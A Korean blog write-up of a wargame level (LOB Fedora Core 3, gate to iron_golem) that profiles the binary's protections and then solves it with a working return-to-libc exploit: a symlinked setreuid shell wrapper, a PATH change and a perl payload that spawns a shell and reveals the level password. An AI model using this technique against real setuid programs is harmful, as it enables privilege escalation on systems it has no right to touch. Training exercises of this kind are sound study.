첫 문제이니 만큼 환경분석부터 시작하겠다.
Fedora core 3 환경분석
Stack Dummy : O
[gate@Fedora_1stFloor ~]$ gcc -v
Reading specs from /usr/lib/gcc/i386-redhat-linux/3.4.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-java-awt=gtk --host=i386-redhat-linux
Thread model: posix
gcc version 3.4.2 20041017 (Red Hat 3.4.2-6.fc3) //2.96버전이상은 dummy가 존재
[gate@Fedora_1stFloor ~]$ gdb -q iron_golem
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x080483d0 <main+0>: push ebp
0x080483d1 <main+1>: mov ebp,esp
0x080483d3 <main+3>: sub esp,0x108
0x080483d9 <main+9>: and esp,0xfffffff0
0x080483dc <main+12>: mov eax,0x0
0x080483e1 <main+17>: add eax,0xf
0x080483e4 <main+20>: add eax,0xf
0x080483e7 <main+23>: shr eax,0x4
0x080483ea <main+26>: shl eax,0x4
0x080483ed <main+29>: sub esp,eax //스택 더미를 형성하는 과정
0x080483ef <main+31>: cmp DWORD PTR [ebp+8],0x1
0x080483f3 <main+35>: jg 0x804840f <main+63>
0x080483f5 <main+37>: sub esp,0xc
0x080483f8 <main+40>: push 0x8048524
0x080483fd <main+45>: call 0x80482f8 <_init+56>
0x08048402 <main+50>: add esp,0x10
0x08048405 <main+53>: sub esp,0xc
0x08048408 <main+56>: push 0x0
0x0804840a <main+58>: call 0x8048308 <_init+72>
0x0804840f <main+63>: sub esp,0x8
0x08048412 <main+66>: mov eax,DWORD PTR [ebp+12]
0x08048415 <main+69>: add eax,0x4
0x08048418 <main+72>: push DWORD PTR [eax]
0x0804841a <main+74>: lea eax,[ebp-264]
0x08048420 <main+80>: push eax
0x08048421 <main+81>: call 0x8048318 <_init+88>
0x08048426 <main+86>: add esp,0x10
0x08048429 <main+89>: sub esp,0x8
0x0804842c <main+92>: lea eax,[ebp-264]
0x08048432 <main+98>: push eax
0x08048433 <main+99>: push 0x8048530
0x08048438 <main+104>: call 0x80482f8 <_init+56>
0x0804843d <main+109>: add esp,0x10
---Type <return> to continue, or q <return> to quit---
0x08048440 <main+112>: leave
0x08048441 <main+113>: ret
0x08048442 <main+114>: nop
0x08048443 <main+115>: nop
End of assembler dump.
Down privileage of bash : O
Random Stack : O
[gate@Fedora_1stFloor ~]$ cat /proc/sys/kernel/exec-shield-randomize
1
[gate@Fedora_1stFloor ~]$ cat > ASLR_test.c
unsigned long getEBP(void){
asm("movl %ebp,%eax");
}
int main(void){
printf("EBP:%x\n",getEBP());
}
[gate@Fedora_1stFloor ~]$ gcc -o ASLR_test ASLR_test.c
[gate@Fedora_1stFloor ~]$ ./ASLR_test
EBP:fef3d600
[gate@Fedora_1stFloor ~]$ ./ASLR_test
EBP:fee85660
[gate@Fedora_1stFloor ~]$ ./ASLR_test
EBP:fef699b0
[gate@Fedora_1stFloor ~]$ ./ASLR_test
EBP:fee30e40
[gate@Fedora_1stFloor ~]$ ./ASLR_test
EBP:fee43770
Random Library : X
[gate@Fedora_1stFloor ~]$ cat /proc/self/maps | grep -e libc
0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so
[gate@Fedora_1stFloor ~]$ cat /proc/self/maps | grep -e libc
0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so
[gate@Fedora_1stFloor ~]$ cat /proc/self/maps | grep -e libc
0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so //라이브러리의 주소가 변하지 않는다.
Random Program Binary Mapped : X
ASCII Armor : O
[gate@Fedora_1stFloor ~]$ cat /proc/self/maps
00703000-00718000 r-xp 00000000 fd:00 68707 /lib/ld-2.3.3.so //주소값 최상위 1바이트가 NULL
00718000-00719000 r--p 00014000 fd:00 68707 /lib/ld-2.3.3.so
00719000-0071a000 rw-p 00015000 fd:00 68707 /lib/ld-2.3.3.so
0071c000-0083d000 r-xp 00000000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083d000-0083f000 r--p 00120000 fd:00 68708 /lib/tls/libc-2.3.3.so
0083f000-00841000 rw-p 00122000 fd:00 68708 /lib/tls/libc-2.3.3.so
00841000-00843000 rw-p 00841000 00:00 0
08048000-0804c000 r-xp 00000000 fd:00 228524 /bin/cat
0804c000-0804d000 rw-p 00003000 fd:00 228524 /bin/cat
08863000-08884000 rw-p 08863000 00:00 0
f6df8000-f6ff8000 r--p 00000000 fd:00 558549 /usr/lib/locale/locale-archive
f6ff8000-f6ff9000 rw-p f6ff8000 00:00 0
fef52000-ff000000 rw-p fef52000 00:00 0
ffffe000-fffff000 ---p 00000000 00:00 0
Non-Executable Stack : O
[gate@Fedora_1stFloor ~]$ cat /proc/sys/kernel/exec-shield
1
[gate@Fedora_1stFloor ~]$ readelf -l iron_golem
Elf file type is EXEC (Executable file)
Entry point 0x8048328
There are 7 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x000e0 0x000e0 R E 0x4
INTERP 0x000114 0x08048114 0x08048114 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x00538 0x00538 R E 0x1000
LOAD 0x000538 0x08049538 0x08049538 0x00108 0x0010c RW 0x1000
DYNAMIC 0x00054c 0x0804954c 0x0804954c 0x000c8 0x000c8 RW 0x4
NOTE 0x000128 0x08048128 0x08048128 0x00020 0x00020 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 실행권한인 E가 없다
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame
03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
04 .dynamic
05 .note.ABI-tag
06
Non-Executable Heap : O
[gate@Fedora_1stFloor ~]$ readelf -l iron_golem
Elf file type is EXEC (Executable file)
Entry point 0x8048328
There are 7 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x000e0 0x000e0 R E 0x4
INTERP 0x000114 0x08048114 0x08048114 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x00538 0x00538 R E 0x1000
LOAD 0x000538 0x08049538 0x08049538 0x00108 0x0010c RW 0x1000
DYNAMIC 0x00054c 0x0804954c 0x0804954c 0x000c8 0x000c8 RW 0x4 //실행권한이 없음
NOTE 0x000128 0x08048128 0x08048128 0x00020 0x00020 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame
03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
04 .dynamic
05 .note.ABI-tag
06
Stack Carany : X
[gate@Fedora_1stFloor ~]$ gdb -q iron_golem
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x080483d0 <main+0>: push ebp
0x080483d1 <main+1>: mov ebp,esp
0x080483d3 <main+3>: sub esp,0x108
0x080483d9 <main+9>: and esp,0xfffffff0
0x080483dc <main+12>: mov eax,0x0
0x080483e1 <main+17>: add eax,0xf
0x080483e4 <main+20>: add eax,0xf
0x080483e7 <main+23>: shr eax,0x4
0x080483ea <main+26>: shl eax,0x4
0x080483ed <main+29>: sub esp,eax
0x080483ef <main+31>: cmp DWORD PTR [ebp+8],0x1
0x080483f3 <main+35>: jg 0x804840f <main+63>
0x080483f5 <main+37>: sub esp,0xc
0x080483f8 <main+40>: push 0x8048524
0x080483fd <main+45>: call 0x80482f8 <_init+56>
0x08048402 <main+50>: add esp,0x10
0x08048405 <main+53>: sub esp,0xc
0x08048408 <main+56>: push 0x0
0x0804840a <main+58>: call 0x8048308 <_init+72>
0x0804840f <main+63>: sub esp,0x8
0x08048412 <main+66>: mov eax,DWORD PTR [ebp+12]
0x08048415 <main+69>: add eax,0x4
0x08048418 <main+72>: push DWORD PTR [eax]
0x0804841a <main+74>: lea eax,[ebp-264]
0x08048420 <main+80>: push eax
0x08048421 <main+81>: call 0x8048318 <_init+88>
0x08048426 <main+86>: add esp,0x10
0x08048429 <main+89>: sub esp,0x8
0x0804842c <main+92>: lea eax,[ebp-264]
0x08048432 <main+98>: push eax
0x08048433 <main+99>: push 0x8048530
0x08048438 <main+104>: call 0x80482f8 <_init+56>
0x0804843d <main+109>: add esp,0x10
---Type <return> to continue, or q <return> to quit---
0x08048440 <main+112>: leave
0x08048441 <main+113>: ret //Canary가 보이지 않는다.
0x08048442 <main+114>: nop
0x08048443 <main+115>: nop
End of assembler dump.
Stack Smashing Protector : X
[gate@Fedora_1stFloor ~]$ gdb -q iron_golem
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x080483d0 <main+0>: push ebp
0x080483d1 <main+1>: mov ebp,esp
0x080483d3 <main+3>: sub esp,0x108
0x080483d9 <main+9>: and esp,0xfffffff0
0x080483dc <main+12>: mov eax,0x0
0x080483e1 <main+17>: add eax,0xf
0x080483e4 <main+20>: add eax,0xf
0x080483e7 <main+23>: shr eax,0x4
0x080483ea <main+26>: shl eax,0x4
0x080483ed <main+29>: sub esp,eax
0x080483ef <main+31>: cmp DWORD PTR [ebp+8],0x1
0x080483f3 <main+35>: jg 0x804840f <main+63>
0x080483f5 <main+37>: sub esp,0xc
0x080483f8 <main+40>: push 0x8048524
0x080483fd <main+45>: call 0x80482f8 <_init+56>
0x08048402 <main+50>: add esp,0x10
0x08048405 <main+53>: sub esp,0xc
0x08048408 <main+56>: push 0x0
0x0804840a <main+58>: call 0x8048308 <_init+72>
0x0804840f <main+63>: sub esp,0x8
0x08048412 <main+66>: mov eax,DWORD PTR [ebp+12]
0x08048415 <main+69>: add eax,0x4
0x08048418 <main+72>: push DWORD PTR [eax]
0x0804841a <main+74>: lea eax,[ebp-264]
0x08048420 <main+80>: push eax
0x08048421 <main+81>: call 0x8048318 <_init+88>
0x08048426 <main+86>: add esp,0x10
0x08048429 <main+89>: sub esp,0x8
0x0804842c <main+92>: lea eax,[ebp-264]
0x08048432 <main+98>: push eax
0x08048433 <main+99>: push 0x8048530
0x08048438 <main+104>: call 0x80482f8 <_init+56>
0x0804843d <main+109>: add esp,0x10
---Type <return> to continue, or q <return> to quit---
0x08048440 <main+112>: leave
0x08048441 <main+113>: ret //__stack_chk_fail 이 보이지 않는다
0x08048442 <main+114>: nop
0x08048443 <main+115>: nop
End of assembler dump.
일단 이번 페도라 LOB는 되도록이면 브루트포스 공격은 삼가도록 하겟다.
일단 NX stack 이기 때문에 환경변수 공격은 사용 할 수 없고 나머지 스택을 이용한 공격도 통하지 않는다.
그래서 RTL공격을 사용할려고 했는데, ascii armor 때문에 인자를 뒤에 원래 스택에 위치해있는 쓰레기 값으로 심볼릭 링크를 사용해서 이용해야한다.
[gate@Fedora_1stFloor ~]$ cp iron_golem iron_gole1
[gate@Fedora_1stFloor ~]$ gdb -q iron_gole1
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80483d9
(gdb) r
Starting program: /home/gate/iron_gole1
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x080483d9 in main ()
(gdb) x/40x $ebp
0xfeed0e48: 0xfeed0ea8 0x00730e33 0x00000001 0xfeed0ed4
0xfeed0e58: 0xfeed0edc 0x0070eab6 0x0083eff4 0x00000000 //스택 바깥의 고정된 2개의 주소중 하나를 인자로 사용 //더짧은것을 사용하는게 좋다.
0xfeed0e68: 0xfeed0e60 0xfeed0ea8 0xfeed0e50 0x00730df5
0xfeed0e78: 0x00000000 0x00000000 0x00000000 0x00718fb4
0xfeed0e88: 0x00000001 0x08048328 0x00000000 0x0070e9f0
0xfeed0e98: 0x0070f340 0x00718fb4 0x00000001 0x08048328
0xfeed0ea8: 0x00000000 0x08048349 0x080483d0 0x00000001
0xfeed0eb8: 0xfeed0ed4 0x08048444 0x08048498 0x0070f340
0xfeed0ec8: 0xfeed0ecc 0x00715e31 0x00000001 0xfef68c20
0xfeed0ed8: 0x00000000 0xfef68c36 0xfef68c4f 0xfef68c5f
(gdb) x/s 0x0070eab6
0x70eab6 <fixup+150>: "\213Uð\203ì\024\211Á1À\205Òt\v\205ÉtL\213B\004\2131\001ð\213»øüÿÿ\205ÿu\005\213Mä\211\001\215eô[^_]Ã\213Mè\213@\004\017·\004H\213\216\210\001"
(gdb) x/s 0x0083eff4 //더 짧다.
0x83eff4 <svcauthsw+712>: "<í\203"
(gdb) x/x 0x0083eff4
0x83eff4 <svcauthsw+712>: 0x0083ed3c
(gdb) quit
The program is running. Exit anyway? (y or n) y
[gate@Fedora_1stFloor ~]$ cat > sh.c
#include <stdio.h>
#include <stdlib.h>
int main()
{
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
system("/bin/sh");
}
[gate@Fedora_1stFloor ~]$ gcc -o sh sh.c
[gate@Fedora_1stFloor ~]$ ln -s sh `perl -e 'print "\x3c\xed\x83"'`
[gate@Fedora_1stFloor ~]$ export PATH=./:$PATH //환경변수 PATH맨 앞에다 현재폴더를 추가해준다.
#####payload 작성 ###########
*dummy확인하기
[gate@Fedora_1stFloor ~]$ gdb -q iron_golem
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b *main+31
Breakpoint 1 at 0x80483ef
(gdb) r
Starting program: /home/gate/iron_golem
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x080483ef in main ()
(gdb) set $x=$ebp-$esp
(gdb) print $x
$1 = 280
그런데 처음에 264byte만큼 버퍼를 할당 하였으니까 dummy의 크기는 16byte가 된다.
['a' * 268][&ret *3][execve] --> system함수를 안쓰는 이유는
system() 함수는 내부 루틴중에 geteuid 를 재설정 해주는 부분이 있기 때문에 이를 유지 할 수 없다. 따라서 system 함수의 주소값 대신에 execve 주소값을 찾아 줘야 한다.
#########################
[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x3,"\x90\x54\x7a\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAATz
sh-3.00$ id
uid=501(iron_golem) gid=501(iron_golem) groups=500(gate) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 501
blood on the fedora
'wargame > LOB FC' 카테고리의 다른 글
| LOB FC3 [dark_eyes -> hell_fire] 를 풀다가 생긴 의문점에 대한 분석 (0) | 2014.04.24 |
|---|---|
| LOB FC3 [dark_eyes -> hell_fire] (0) | 2014.04.24 |
| LOB FC3 [iron_golem -> dark_eyes] (0) | 2014.04.24 |
| LOB FC3 [gate -> iron_golem] 를 풀다가 생긴 의문점에 대한 분석 (4) | 2014.04.23 |